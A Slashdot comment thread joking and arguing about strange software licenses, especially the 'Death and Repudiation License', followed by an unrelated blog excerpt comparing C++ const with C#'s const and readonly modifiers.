Would You Die To Respect a Software License? 233 Julie188 writes "Some 2,000 licenses cover the 230,000+ projects in Black Duck's open source knowledge base. While 10 licenses comprise 93% of the software, that leaves 1,980-odd licenses for the other 3% — and some of them have really crazy conditions. The Death and Repudiation License, for instance, requires the user to be dead." Hell No ! (Score:4, Funny) Even if I like a software to be free as in freedom, I respect a software developer to do whatever with his software Re: (Score:2) There are and needs to be more stringent restrictions on what can be put in a license agreement. Right now you could sign away your first born with my Primary Recombinant DNA Acquisition license but I'd be SOL when I came to collect. License often carry unreasonable terms for the licensee and no responsibility for the licenser. I think that licenses should be standardised (as in ISO) and ha Math license (Score:5, Funny) Which license redefines math so that 1980 + 10 = 2000, and taking 93% leaves only 3% remaining? Re: (Score:2) The Sonny Bono License. The humorless answer: (Score:5, Informative) The summary left out part of a sentence: It's important to note that the top 10 licenses cover 93% of all projects and the top 20 almost 97%. Re: (Score:2) Welcome to New Math! Where any answer is the right one! Way to go Jimmy! Re: (Score:2, Insightful) It's not news, it's Slashdot (Score:5, Insightful) Slow day. Re:It's not news, it's Slashdot (Score:5, Funny) Here's some more ideas: Would you smell a nasty fart to prevent terrorism? Would you give up your ability to see if it meant you could time travel? Would you listen to an entire Britney Spears album if it could bring about world peace? Re:It's not news, it's Slashdot (Score:5, Funny) -- Would you take a job as Steve "Monkeyboy" Ballmer's toe-cheese extractor if it meant Microsoft would publish only via OSS licenses? -- Would you take a position as Steve "Tyrant" Jobs' fashion consultant if it meant Apple would open up the app store? -- Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel? These are the type of choices that would keep me up at night. Re: (Score:2) You owe me a meal and a bottle of brain bleach for that written Goatse/PainSeries. Please mod down. Re: (Score:2) Re: (Score:3, Informative) just ask rms: [youtube.com] Re: (Score:3, Informative) Re:It's not news, it's Slashdot (Score:5, Funny) I suppose it would be a worthy sacrifice. I am willing to expend my life in pursuit of turtlenecks if it means Openness for all. No! Not in a thousand lifetimes, no! What do you think I am, you sick twisted fuck?!? Re: (Score:2) Microsoft to publish their source code under OSS licenses? So you want Steve Ballmer's toe cheese to not only be smelled by you but also to proliferate throughout the entire internet? Re:It's not news, it's Slashdot (Score:5, Funny) -- Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel? Would get Stallman to finally shut up? If so, I'd definitely consider it. Re: (Score:2) you, sir, owe me a new keyboard, plus a case of hard liquor to remove the mental image of someone licking RMS's armpit from my brain Re: (Score:2) -- Would you take a position as Steve "Tyrant" Jobs' fashion consultant if it meant Apple would open up the app store? That's easy. I could write a program to do that! #include <stdio.h> int main() { printf("Ah, Mr Jobs. Try the black skivvy - I am sure you will like it.\n"); return 0; } Re: (Score:2) Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel? C'mon now, asking for someone to sacrifice his life for a cause, even as worthy as that, is too much! Re:It's not news, it's Slashdot (Score:4, Funny) Where did you get an Instant Adult (tm) cloning device? I thought they were sold out? I personally lack the replicator necessary to fork Stallman and lick him myself. Re: (Score:2, Insightful) Re: (Score:2) Re: (Score:2) Would you listen to an entire Britney Spears album if it could bring about world peace? Britney's albums are hardly what I would call "music", and the concept of world peace is the antithesis to human nature. Regardless, it's par for the course. Re: (Score:2, Insightful) Would you listen to an entire Britney Spears album if it could bring about world peace? Depends, is "world peace" defined as "all humans exterminated" and is the Spears album the delivery method of said destruction? Re: (Score:2) Who put the Idle story in the News bin? (Score:4, Insightful) If a software license exists, and no software is written that is available under the terms of that license, does it merit discussion on Slashdot? It looks to me as somebody set up a site to create a gallery of TOSes so software writers can get some ideas... but then the site got attacked by the typical forum trolls took over and we get a comedy site as the end result. This belongs to Idle next to news from The Onion. Re: (Score:2) No software? I'm dissapointed... Seems like a decent fit for grave / graveyard info screens, embedded software used for some equipment required for transplants, controlling the morgue, etc. Re: (Score:2, Interesting) Although would it be possible for this license to have close to an applicable use? Ie. Software for dealing with funeral expenses. You can only use it if you are dead, and being dead gives leave for your family to access the software license only. If you aren't dead, then they or you are breaking the terms of the license. Just a thought, obviously the terms of excessive punishment may need to be edited. Severability (Score:3, Insightful) I believe a court would find that clause unenforceable and sever it from the rest of the contract. Re: (Score:2) I believe a court would also find that you lack any sense of humor. The D&R license is a joke. Re: (Score:2) No, really? Re: (Score:2) So? It's still offered as license. Since it's offered as an option with a BSD license it doesn't really matter, but if the software was actually valuable and other license more restrictive making such a joke could end up costing you when someone tries to get a court to strip bits out and just leave "you can have it all"... Re: (Score:2) Only if it was unconditional. If (as with most free software licenses) it was conditioned on actions that would ordinarily violate copyright, the court might simply ignore the clause as irrelevant (and probably whimsical*), and rule that you're guilty of copyright violation. In fact, as with the GPL, it's unlikely that the license would ever be mentioned in court, since the plaintiff has a straightforward copyright violation case, and the defendant can't claim to be dead and thus protected from prosecutio Quip on Contracts (Score:5, Insightful) The "freedom to encumber" works is like the "freedom to punch someone" ... They are both 'freedoms' that only exist at the expense of others. -- Gregory Maxwell, discussion on licensing Re:Quip on Contracts (Score:5, Insightful) That would be a good description of copyright, and thus copyright licenses, but not contracts in general. The terms of a contract are merely conditions which you require to be met before you will voluntarily give the other party some of your property, which you are in no way obligated to do. No matter what the terms may be, they impose no expense on others; one is always free to ignore the offer should one find the terms unpalatable. Licenses are similar, but the copyrights which give licenses their power are artificial social-engineering constructs which only exist at the expense of others. Re:Quip on Contracts (Score:5, Insightful) Fair, although contract law has recognised certain topics where contracts are not free for good reason - situations of some sorts are considered generally either coercive or one-sided enough that the public good is ill-served by the absence of some (or significant regulation). Landlord-tenant law is one example, although English common law has accumulated a long list of other circumstances and remedies to specific abuses, many of which we've kept in the US. Re: (Score:2) I recognize that modern contract law has (incorrectly and unjustly, IMHO) rendered certain kinds of contractual terms void. However, even if such terms were fully enforceable they would still be nothing like the "freedom to punch someone" referred to in the Gregory Maxwell quote. I don't know about serving "the public good"—that isn't really the purpose of contracts, at least not directly—but no mere contractual term is ever truly coercive per se. Somewhere along the line the idea came about that Re: (Score:2) Many of us support the use of force to serve the public good, and feel that the public good is in fact the whole point of government and society. I see where you're coming from though - there's a number of ways to think about the goals/purposes of these things. Re: (Score:2) Many of us support the use of force to serve the public good, and feel that the public good is in fact the whole point of government and society. I would not really disagree with either of those statements. However, in my considered opinion the initiation of force against non-aggressors never serves the public good. The purpose of government may indeed be to serve the public good, but I feel its fundamental nature as a legitimized aggressor can only serve to undermine that purpose. I am not a utilitarian; I do not believe that it is possible to weight the benefits to some against involuntary costs imposed on others. The obvious corellary is that the o Re: (Score:2) It's not only utilitarians who consider such weighings - various principled philosophies do as well. Any concept of duty that's not wholly negative requires it. It sounds like your perspective is somewhere in the Libertarian-Objectivist spectrum - mine is somewhere in the Academic-Socialist spectrum - I suspect we're not going to see eye-to-eye on what you'd call coercion. To me, autonomy is one thing that's important for human happiness and well-being but it's something I'd sacrifice in certain structured Re: (Score:2) For example, in a fully free market (one in which there are no constraints on contracts), all landlords want maximum rents with minimal investment. Now, in theory, some landlords would become slumlords while Re: (Score:2) I already responded to all of this in the GP comment: Somewhere along the line the idea came about that because someone really wants something, it is somehow coercive to place conditions on giving it to them (even though you aren't required to give it to them at all). I obviously reject this notion; coercion is force, and only force. "Really want" includes things you think you need for survival: food, shelter, work. No one is obligated to provide you with any of that; if they choose to offer it to you they have an absolute right to impose whatever conditions they want. Of course you are free to reject their conditions, but they are equally free to keep their property. Tempering that somewhat, note that I consider contracts to only include transfers of alienable property. In other words Re: (Score:2) Libertarian viewpoint which places liberty as the highest value is completely incompatible with the anarchistic viewpoint because liberty cannot exist in an anarchy, so those terms don't belong in the same sentence, never mind separated by a / as if they are two sides of the same coin. Trouble is, in many housing markets, housing is constrained, either due to resource shortages (water, usually) or geography (too many mountai Re: (Score:2) Libertarian viewpoint which places liberty as the highest value is completely incompatible with the anarchistic viewpoint because liberty cannot exist in an anarchy ... On the contrary, liberty cannot exist except in anarchy. Simply put, government is legitimized aggression; that is the only trait which distinguishes it from other private organizations, such as co-ops. Liberty is the absence of aggression. The libertarian viewpoint is that aggression (initiation of force against a non-aggressor) is never legitimate. The libertarian society can only be anarchistic; if it had a government then it would be endorsing aggression, and thus not libertarian. A fully libertarian soc Re: (Score:2) "Contracts in general" is a really bad description of software licenses. Contracts are rarely one sided and almost always negotiated between parties. More over they require express consent in the form of a signature to be valid. A software license is never negotiated, has no responsibilities for the vendor and uses implied consent (shrink wrap Eula, press F8, click I agree). Most contracts define the Re: (Score:2) Re: (Score:2) The point of quips are that they state a position succinctly and with charm, not that they rely on the authority of the person who said them. I could tell you who he is, but it doesn't really matter. BSD or die (Score:2) Your honor it is clear the defendant rejected the BSD license. They must therefore have accepted the alternate D&R licenses. In recognition of this we demand the death of the defendant as fulfillment of the terms of the license. Death and Repudiation License is peanuts (Score:5, Funny) The Death and Repudiation License is nothing compared to the EULA of iPhone OS 5.1 Re: (Score:2) Back in the 80's... (Score:2, Funny) I remember many shareware authors writing strange things in their terms and licenses. I recall that a common graphics viewer those cool new GIF files (among many other formats) wrote that if you continued using their software after 30 days without paying then a demon would be visited by demons who would torment you. I was just a kid, didn't have a job, and I never paid. Demons rarely ever visited, and when they did it was just to borrow a cup of sugar or use the phone. Re:Back in the 80's... (Score:4, Informative) I have seen ones, approved by the permit people no less, with instructions to the 'bat cave', lyrics from Pink Floyd, and all kinds of weird junk. Re:Back in the 80's... (Score:5, Interesting) I recall that a common graphics viewer those cool new GIF files (among many other formats) wrote that if you continued using their software after 30 days without paying then a demon would be visited by demons who would torment you. Graphics Workshop had something like this. In fact: If you want to see additional features in Graphic Workshop, register it. If we had an Arcturian mega-dollar for everyone who has said they'd most certainly register their copy if we'd add just one more thing to it, we could buy ourselves a universe and retire. Oh yes, should you fail to support this program and continue to use. Mother Jones Software License (Score:2) I was an adult, had a job, and never bought (mainly because I When I was in college... (Score:5, Funny) One of my schoolmates released some software with a custom license, which was basically the old-form original UC Berkeley BSD license with a restriction prohibiting any use by persons in "Country Code F", defined as (paraphrasing from memory): "France, Belgium, Quebec, Sengal, Ghana, Did we mention France?" I think it was bad experiences with language classes in high school, but I'm not sure. Re: (Score:2) To be fair, that list lists Canada three times: Canada, New Brunswick, and Quebec are all member states. That lists governments that are French speaking, not just countries. There are 50 major governments in the US, for example, and thousands of minor governments. I'm far too lazy to look at anything else in the list, but I'm sure there are more "governments within governments" that are recognized separately. Re: (Score:2) D&R license (Score:3, Funny) The D&R license doesn't require anyone to die... you just have to be dead to use software under it. The license even specifies how this is to be accomplished. You're allowed to tell your heirs to use the software on your behalf after you're dead. The really puzzling clause is the revocation clause, which not only allows the licensor to revoke the license, but proclaims that the licensor WILL revoke the license, and then the heirs will be punished "to the fullest extent of the law." I believe a court would only find liability for usage AFTER the licensor revoked, regardless of the drafter's intention. Another strange clause seems to say that ghosts and angels are not considered dead for purposes of the license. Pure silliness, of course. What court would claim jurisdiction over angels and ghosts? Certainly not a human one. And an inhuman one is not likely to respect software licenses. The drafter made a big mistake here in failing to define ghosts and angels. These words are just begging for a legal definition. I am not a lawyer and this is not legal advice. +1 Pedantry (Score:2) Cake or Death? (Score:2) Re: (Score:2) To Paraphrase Jefferson Airplane (Score:2) "Would the software license [orig.: 'my country'] die for me?" Viva la undead nation! (Score:3, Funny) *Pointy Crowned Liches Me (Score:2) I saw this once on the intertubes: I am willing to die to prove that my god exists!!! Are you willing to die to prove that he doesn't! So it's all well and good. Re: (Score:2) Wow! That sort of quote is the quintessence of the median of American theological debate. Since the probability of the first happening is vanishingly small (at least for the moron who spouted it), and the probability of the second higher than the first (at least in this country), being rational, I'd tend to say no to the second. However, that still is not a proof of God's existence (or non-existence). A greater willingness to die stupidly does not a proof make. Of course, being a heathen (and somewhat snar Re: (Score:2) I'm willing to eat a tasty cupcake to prove your god doesn't exist. It may not be as dramatic as dying, but it is every bit as effective a proof! :) D&R license (Score:2) Thereware (Score:2) Remember not to use Java.... (Score:5, Funny) Re: (Score:2) There's my Re: (Score:2) A -lot- of commercial software have that in their licenses. So many, in fact, that I find myself wondering if there aren't laws in some first world countries that force that to be in there somewhere unless you have specific certifications. Re:Remember not to use Java.... (Score:5, Informative) Re: (Score:3, Interesting) You don't think Windows for the Navy actually runs the mission critical systems like the reactor do you? Regardless, every system on the modern navy has a manual control system, not that you can actually hit a target with manual fire control as was proved many times during WWII, but the controls are there just in case you want to fire 1000 shells and only hit the target once. Re: (Score:2) You don't think Windows for the Navy actually runs the mission critical systems like the reactor do you? I thought everything mission critical in the military had to be written in Ada? Re: (Score:3, Informative) I don't know how they reconcile that with Windows for Battleships exactly. I think that's a moot point, because nobody uses battleships anymore. [wikipedia.org] Re: (Score:3, Funny) Re:Remember not to use Java.... (Score:4, Informative) It was Windows for Warships. Kids these days, just don't get alliteration any more. Re: (Score:2) Windows for Battleships is specifically certified for such applications. It's just like the operating systems that run the equipment on fighter jets - they are very thoroughly tested and cleared by the military first. Unlike some oil companies I know, which buy the most expensive product then trust the vendor to tell them how awesome it is even though all their employees are screaming about how it runs slower and with fewer features than the 30 year old tech they were using before. *twitch* Re: (Score:2) Well, thank god, really I wouldn't want a java program controlling a nuclear facility! Or better, I wouldn't want the average java programmer making a java program that will control a nuclear facility. Re: (Score:2) Or better, I wouldn't want the average java programmer making a java program that will control a nuclear facility. Yeah, but that provision means even drawing up a rough preliminary schematic on a drawing program written in Java is verboten. And I believe I found that gem in the JRE EULA, so all common users have to agree to it, not just developers. But you can always get around it by switching to OpenJDK, so beware! Or iTunes. (Score:2) The reality distortion field will not be weaponized! Re: (Score:2) That's a really stupid way for them to word that provision. What if you work at a DoD lab or Northrup Grumman and you like to jam out while you work? Re: (Score:2) ...."the design, construction, operation or maintenance of any nuclear facility." That's in Sun's EULA. For real. According to James Gosling, its there for good reason; to paraphrase: "During the early days of Java there were some guys getting support from Sun for a nuclear simulator. After some long discussions, they found out they were using it for the operation of a nuclear power plant. Sun and their lawyers wanted no part of anything like that, just in case." No warranty fortune cookie (Score:2) Somewhat related is one of my favorite fortune cookies: syst I would die for (Score:2) My family and a few select friends that I believe to be better people than myself. I would like to think I would give my life if it meant saving more that one person. As Spock said (which probably came from someone else I'm sure): The needs of the many outweight the needs of the few or the one. There are several constraints on these things of course, and in reality if it comes right down to it, I would probably not have the courage to do so, even if I think I do now while I'm not facing the decision directl Re: (Score:2, Insightful) Re: (Score:2) You mean if you don't accept the BSD license. If you accept the D&R license, you're fucked. Re:Now that's.... (Score:5, Funny) I strongly suspect the D&R license is a BSD license fan responding to someone wanting them to dual-license something. Re: (Score:3, Interesting) Why would someone want a developer to dual license a BSD licensed project? The BSD license is one of the most permissive there is, especially considering not all countries have the concept of public domain. It's not like it was a GPL/D&R dual licensing situation... Re: (Score:2, Interesting) Many GPL fanbois feel the BSD license is evil. I could see them demanding a dual license, and the developer giving them this subtle "go fuck yourself". Re: (Score:2) That would be pointless. Having something with a permissive license be dual-licenses also with a more restrictive license would accomplish nothing. Not to mention, I cannot think of a single GPL fan that has any issues with other people using BSD licenses if they chose to. In fact, the only real noise I hear coming from this difference of opinion is BSD fanatics criticising GPL fans for being less free. Re: (Score:2) Give me the BSD License or give me... No, not death... What's the other one? Freedom? Re: (Score:2) Bread and circuses. Re: (Score:2) That Death and Repudiation license is awesome. I wish I actually published software so I could use it, that's one hell of a mind-fuck. The only way to use the software is if you are dead (there is an allowance to have your heirs carry out your uses for you), and if you follow the terms of the license it will be repudiated at a time deemed most likely to screw your heirs over. Re: (Score:2) Re: (Score:2) Not if you don't have death. Re: (Score:2) A corporation also can't be considered dead, which is the prime requirement of the D&R contract. You must have been alive to be considered dead. There is even a clause for "dead but interactive", specifically covering ghosts and angels, but would probably also extend to zombies and corporations as well (assuming a corp could pass the dead test). Even if they got around that part though, this part would screw them out the yin-yang:. I'm not sure how that works if the license specifically removes the licen Re: (Score:2) Keith is already dead, his brain just don't know it yet. The D&R license is likely for him, I think. Re: (Score:2) Sadly kid's these days wont get this joke.
http://news.slashdot.org/story/10/05/19/2011253/would-you-die-to-respect-a-software-license?sdsrc=next
CC-MAIN-2016-07
refinedweb
4,372
69.52
Hi All! We have a number of requests filed against $subj. And it seems that we need to rewrite it. Lets make a list of features you'd like to be implemented. By now I know about the following: -- Filter out classes after implements -- Filter out current and final classes in extends What else? IK IntelliJ Labs / JetBrains Inc. "Develop with pleasure!" Hi All! Those after throws and throw new (maybe it works already) ... Tom On Fri, 9 May 2003 01:06:25 +0400, Igor Kuralenok <ik@intellij.com> wrote: > > > > > > On Fri, 9 May 2003 01:06:25 +0400, Igor Kuralenok <ik@intellij.com> wrote: >Hi All! > >We have a number of requests filed against $subj. And it seems that we need >to rewrite it. Lets make a list of features you'd like to be implemented. By >now I know about the following: > >What else? I find the 3 different "code completion" keys (Ctrl-Space, Ctrl-Shift-Space, & Ctrl-Alt-Space) to be very confusing. I would much prefer 1 "Super Code Completion" or "Do What I Mean" key that just does the best job it can. I have submitted for this request. This is one place where IDEA forces me to think about the tool I'm using rather than the code I'm writing. Neil Neil Galarneau wrote: I agree that it's a bit confusing but I don't see how it could be made different without mind reading. Code completion should be able to complete any extended expression that will eventually return a value of the expected type. In other words, if there's a method processFoo(Foo something), and you just typed processFoo(abc.|) where | is the caret, then you want to be able to complete the method getBar() which returns a Bar that in turn has a method getFoo(). Eventually you get processFoo(abc.getBar().getFoo()). There must be a way for completion to do this, so clearly getBar() should be part of the completion list. If it isn't, you'd have to type getBar() manually. But sometimes you know that abc has a method that returns a Foo directly and that that is the method you want. So when you've typed processFoo(abc.|) and you invoke code completion, you only want the items that return a Foo directly. There must be a way for completion to do this, so clearly getBar() should NOT be part of the completion list. If it is, you'll get thousands of irrelevant completions in the list. How do you reconcile these two different usage patterns without having different keyboard shortcuts? As for class name completion, you usually only want to use the classes you have already imported. It would be extremely annoying not to have a quick way to expand "FileI" to "FileInputStream" because some irrelevant classes like com.sun.imageio.spi.FileImageOutputStreamSpi get in the way, when you haven't imported them and you're not interested in them. On the other hand, when you have not yet imported FileInputStream, it would be quite annoying to have to type the entire name, wait for the intention popup, and then let IDEA import it. Not to mention if you can't remember exactly how the class name is spelled. So clearly there are cases when you want all class names (in some sense, all global identifiers) to be available in the list. Again, this seems like it would be best solved by different keyboard shortcuts. I thought about what would happen if you let ctrl-space pop up the "smart" completion list and then pressing it again would expand the list to contain the larger non-smart completion list, but then you could not auto-complete when the smart completion list only had one entry, so it would not really work. Although one inconsistency that could perhaps be addressed is that ctrl-space does not always yield a superset of ctrl-shift-space. Consider this simple class, where again | is the caret: public class Foo { public static void main(String[] args) { foo(|); } static void foo(String[] x) {} } If you press ctrl-shift-space, "args" is auto-completed. If you press ctrl-space, you get no completions at all. If this was changed so that ctrl-space always showed all completions, even if the list happened to be quite long, then you could consistently use ctrl-space and you would be certain to get all the completions you could want (and possibly some more, so you'll have to spend a little bit more time to read the list and select one). Jonas Kvarnstr?m wrote: >> I find the 3 different "code completion" keys (Ctrl-Space, >> Ctrl-Shift-Space, & Ctrl-Alt-Space) to be very confusing.. Cycling from local to general could cover that as well.. Jon This is getting off topic. I agree with this, and with using only one key for basic+smart type completion: It has become automatic pressing control-shift-space (or rather alt-space as I remmapped it) followed by control-space. But I wouldn't use the completion key - to error prone. Using the invocation key is better: control-space -> smart-type, again -> basic -> again -> classes control-shift-space would navigate in teh reverse way. Or maybe: control-space changes between smart-type/basic and control-alt-space continues to be only class completion. Also: If a list is empty, automatically show the next broader list: if smart type is chosen and no list is available automatically show the basic completion list. No, Control-space or Control-shift-space again :) Also: Clarify exactly what each level of code completion does. My understanding now (as it seems to not be the same everywhere) of what it should be: Basic: visible names (imports + fields + locals + methods) . Smart type: visible names filtered by appropriate return/parameter/assignation type - almost forgotten: and smart live tempates. Class: every visible class in the system. Carlos And after new, if it's an assignment/parameter/...: And after catch and throw (again, maybe it works already)... > > > Carlos Costa e Silva wrote: >. It isn't important to me what key combo makes it happen. FYI-- for anyone who missed it, you can vote for the as yet not completely fleshed out feature at The reversing option with a meta-key is new to me and a possibility. I'm not sure if I would have them separate or not. Doesn't it seem like context could help decide? Maybe if the context called for a class or interface, it would start with narrow class completion (already imported and matching type if type narrow context), broader class completion, then on to basic. Yes. >. Sure. Agree on getting it all clarified. This would help to decide how it all could fit together in a cycle and whether it should be cleaned up to better support cycling. Jon Igor Kuralenok wrote: Filter out interfaces you already implement. Filter out superinterfaces of interfaces you already implement. In extends for interfaces: Filter out any interface(s) you already extend Probably filter out superinterfaces of interfaces you already extend Not sure I completely understand the question. Are you only asking about where class/interface filtering can be inherently applied or are you open to having a cycle on class name completion that has a narrow list first time that is only already imported stuff and then a broader list that includes all possibilities? Thanks, Jon Jon Steelman wrote: Yes, I suppose it could. Actually I started writing that message convinced that there was no way of improving the current completion keys and then I partially changed my mind while writing it. Now you've changed it even further :) It's a bit hard to judge how well it would work "in theory", so it would be very interesting to see something like this implemented in an EAP release so that we could test it in practice. > > Do what (I think) JBuilder used to do. Include getBar() in the list, but sort the list for relevance - members of the type or descendants of the type required come first, so that getFoo() is before getBar() (and is probably preselected too), but getBar() is still accessible from that list. Incidentally, JBuilder only had one key for smart complete and it was sufficient, however JBuilder did not include Class Completion for non-imported classes. When the Amis chaps implemented this with Productivity, they added another key stroke for that, which I think is right as it's a quite seperate action. So 3 different strokes is too many, but 2 are definately needed. N. Jonas Kvarnstr?m wrote: >>. Agreed on needing to see it in EAP. Say, does the openapi have enough power to implement this on top of all the current code completion features or would IntelliJ folks have to do it? Jon Hi Guys! sorry for a long silence. I'll comment your suggestions in separate mail. Here I just want to answer the only question: No. I think not. I think we should extend access to completion features in OpenAPI but this is my personal opinion and we need to discuss this with other members of our team first. IK Hi All! Ok. I agree with this features. When I wrote that letter I was thinking on possible class name completion features. Summarizing the discussion: It'd be nice to have: -- Shortcut that cycle through all completions. -- A key that extends/narrows a lookup list in completion. Good things: -- One shortcut for all kind of completion Bad things: -- No "completion on one keystroke" what kind of completion should we choose? -- More complicated navigation for newbies (this is arguable but this is just my point of view :)). I have the following idea for completion enhancement: All shortcuts will stay the same except one thing: in normal completion lookup on left/right key the completion type will be changed. Agree? Thanks, IK Forgot the filter after "instanceof": - When the left type is a class, filter only subclasses or interfaces, that are implemented by subclasses. - When the left type is an interface, all classes and subclasses of this interface should be filtered out. Tom > lookup on left/right key the completion type will be changed. > I'd see subsequent CtrlSpace (CtrlShift+Space) commands as being more intuitive (limiting the number of key combinations one has to remember as well), but that's just me. If you go with the arrow keys could we have the key binding exposed so we can re-map it? Thx. Andrei Good idea! Ok. This will be assignable inside completion settings. Please ensure, that one can map the completion to the ]]> key. Tom The completion shortcuts and their binding remain the same. I think that's reasonable to have a separate binding inside completion settings for changing completion type inside lookup. IK Thomas Singer wrote: I would like that too, but this makes it a little more complicated if you also want live templates to work into the mix. For example, where do we want live templates to go to the completion cycle? Jon Igor Kuralenok wrote: > Yes. Depending on the keys involved, I think you can still do the one keystroke completion when the first, narrowest lookup list has exactly one match. For example, if a meta key like Shift is involved, they just let go of the keys and that accepts the completion on one keystroke. However, if they want to cycle to broader, they would keep holding down the Shift then strike the other key(s) that originally invoked completion. A single key completion with something like tab that has no meta-key might not be able to work this way unless you did a timer than waited for another tab within a limited period to represent cycling. This would be good in that a power user can start the completion where they want it but still be able to cycle. In addition to this, however, I was imagining a completion system that did it's best to figure out the most appropriate completion (possibly including live templates) given the context. So, in addition to all the existing specific completion entry points you're proposing, it would be nice if there were a general completion key sequence that selects the most likely narrowest list and allows you to cycle out and back around from there. The universal completion would clearly need added intelligence to figure out which list to select to start. Thanks, Jon Hmm, did not thought about live templates. Does really somebody ]]> and ]]> to invoke different live templates? Maybe there could be one (customizable) shortcut to invoke them? Tom > lookup on left/right key the completion type will be changed. > Yes. Also, if the a completion is empty automatically show the "next" one. I really dislike control-shift enter resulting in no completion list.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206319859-Class-name-completion?page=1
CC-MAIN-2020-34
refinedweb
2,146
62.68
This section covers the important aspect of metrics management in k6. How and what kind of metrics k6 collects automatically (built-in metrics), and what custom metrics you can make k6 collect. The built-in metrics are the ones you can see output to stdout when you run the simplest possible k6 test, e.g. k6 run github.com/loadimpact/k6/samples/http_get.js which will output something like the below: All the http_req_... lines and the ones after them are built-in metrics that get written to stdout at the end of a test. The following six built-in metrics will always be collected by k6: vus Gauge Current number of active virtual users vus_max Gauge Max possible number of virtual users (VU resources are preallocated, to ensure performance will not be affected when scaling up the load level) iterations Counter The aggregate number of times the VUs in the test have executed the JS script (the default function). Or, in case the test is not using a JS script but accessing a single URL, the number of times the VUs have requested that URL. data_received Counter The amount of received data. data_sent Counter The amount of data sent. checks Rate Number of failed checks. There are also built-in metrics that will only be generated when/if HTTP requests are made: http_reqs Counter How many HTTP requests has k6 generated, in total. http_req_blocked Trend Time spent blocked (waiting for a free TCP connection slot) before initiating request. float http_req_looking_up Trend Time spent looking up remote host name in DNS. float http_req_connecting Trend Time spent establishing TCP connection to remote host. float http_req_tls_handshaking Trend Time spent handshaking TLS session with remote host. http_req_sending Trend Time spent sending data to remote host. float http_req_waiting Trend Time spent waiting for response from remote host (a.k.a. "time to first byte", or "TTFB"). float http_req_receiving Trend Time spent receiving response data from remote host. float http_req_duration Trend Total time for the request. It's equal to http_req_sending + http_req_waiting + http_req_receiving (i.e. how long did the remote server take to process the request and respond, without the initial DNS lookup/connection times). float Accessing HTTP timings from a script If you want to access the timing information from an individual HTTP request, the built-in HTTP timing metrics are also available in the HTTP Response object: import http from "k6/http"; export default function() { var res = http.get(""); console.log("Response time was " + String(res.timings.duration) + " ms"); }; In the above snippet, res is an HTTP Response object containing: res.body( stringcontaining the HTTP response body) res.headers( objectcontaining header-name/header-value pairs) res.status( integercontaning HTTP response code received from server) res.timings( objectcontaining HTTP timing information for the request on ms) res.timings.blocked= http_req_blocked res.timings.looking_up= http_req_looking_up res.timings.connecting= http_req_connecting res.timings.sending= http_req_sending res.timings.waiting= http_req_waiting res.timings.receiving= http_req_receiving res.timings.duration= http_req_duration You can also create your own metrics, that are reported at the end of a load test, just like HTTP timings: import http from "k6/http"; import { Trend } from "k6/metrics"; var myTrend = new Trend("waiting_time"); export default function() { var r = http.get(""); myTrend.add(r.timings.waiting); }; The above code will: - create a Trend metric named “waiting_time” and referred to in the code using the variable name myTrend Custom metrics will be reported at the end of a test. Here is how the output might look: All metrics (both the built-in ones and the custom ones) have a type. There are four different metrics types, and they are: Counter, Gauge, Rate and Trend. Counter (cumulative metric) import { Counter } from "k6/metrics"; var myCounter = new Counter("my_counter"); export default function() { myCounter.add(1); myCounter.add(2); }; The above code will generate the following output: The value of my_counter will be 3 (if you run it one single iteration - i.e. without specifying --iterations or --duration). Note that there is currently no way of accessing the value of any custom metric from within Javascript. Note also that counters that have value zero ( 0) at the end of a test are a special case - they will NOT be printed to the stdout summary. Gauge (keep the latest value only) import { Gauge } from "k6/metrics"; var myGauge = new Gauge("my_gauge"); export default function() { myGauge.add(3); myGauge.add(1); myGauge.add(2); }; The above code will result in output like this: The value of my_gauge will be 2 at the end of the test. As with the Counter metric above, a Gauge with value zero ( 0) will NOT be printed to the stdout summary at the end of the test. Trend (collect trend statistics (min/max/avg/percentiles) for a series of values) import { Trend } from "k6/metrics"; var myTrend = new Trend("my_trend"); export default function() { myTrend.add(1); myTrend.add(2); }; The above code will make k6 print output like this: A trend metric is really a container that holds a set of sample values, and which we can ask to output statistics (min, max, average, median or percentiles) about those samples. By default, k6 will print average, min, max, median, 90th percentile and 95th percentile. Rate (keeps track of percentage of values in a series that are non-zero) import { Rate } from "k6/metrics"; var myRate = new Rate("my_rate"); export default function() { myRate.add(true); myRate.add(false); myRate.add(1); myRate.add(0); }; The above code will make k6 print output like this: The value of my_rate at the end of the test will be 50%, indicating that half of the values added to the metric were non-zero. Notes - custom metrics are only collected from VU threads at the end of a VU iteration, which means that for long-running scripts you may not see any custom metrics until a while into the test. If you use Load Impact Insights, it can draw all the metrics as shown on the screenshot below. By default it shows only very basic metrics, but you will be able to add both system and custom metrics as more graphs, or as different metrics on the same one.
https://docs.k6.io/docs/result-metrics
CC-MAIN-2019-39
refinedweb
1,025
63.09
. One of the things I sort-of miss from C++ (it has its good and bad) is the const modifier. Yes, while it’s true that we have a const modifier in C# (as well as readonly), but it’s not quite as robust. Many times you’ll want to return an internal member of a class but not want it to be directly modifiable by the user of that class. This article discusses how to present simple types as read-only. Note: I’m deliberately avoiding creating read-only views of collections in this particular article, but I will cover that in a follow-up article as there are multiple ways to achieve that as well. For the purposes of this article we will assume the types are all fairly flat with no collections. In C++ you can mark an identifier (even parameters) of any type as const and you cannot call any mutable operations on that identifier. Now, to be fair, C++ makes you jump through hoops to gain that distinction. You have to mark every method that does not mutate the type as const as well to indicate that the method will not mutate the type: 1: // C++ code, sorry for all you C#-ers 2: class Queue 3: { 4: private: 5: // ... 6: 7: public: 8: // const modifier here says Count() will not modify Queue. 9: int Count() const; 10: 11: // no const modifier, so Pop can modify Queue. 12: void Pop(); 13: 14: // ... 15: }; So, if you have two different identifiers (even parameters) of type Queue: 1: // can call any methods on nonConstQueue, but only explicitly marked 2: // const methods on constQueue. 3: void DoSomethingWithTwoQueues(Queue& nonConstQueue, const Queue& constQueue) 4: { 5: // ... 6: } In this case, nonConstQueue is not declared const, so you can call any Queue method. However, constQueue, is declared const, so you can only call methods that have explicitly been marked const. Now, in C++ you can cheat this by casting away const-ness or marking members as mutable. But on the whole this gives you an easy way to present a read-only view of mutable data. So, how does this relate to C#? Well, in C# you can mark identifiers as const but only if they are compile time constants. This means that the constant must be a numeric literal, boolean literal, string literal, char literal, or null for reference types. So what about readonly? In C#, readonly is akin to Java’s final modifier in that it works well for value types (numeric, char, struct) and immutable types (string), but for any mutable reference type is somewhat ineffective 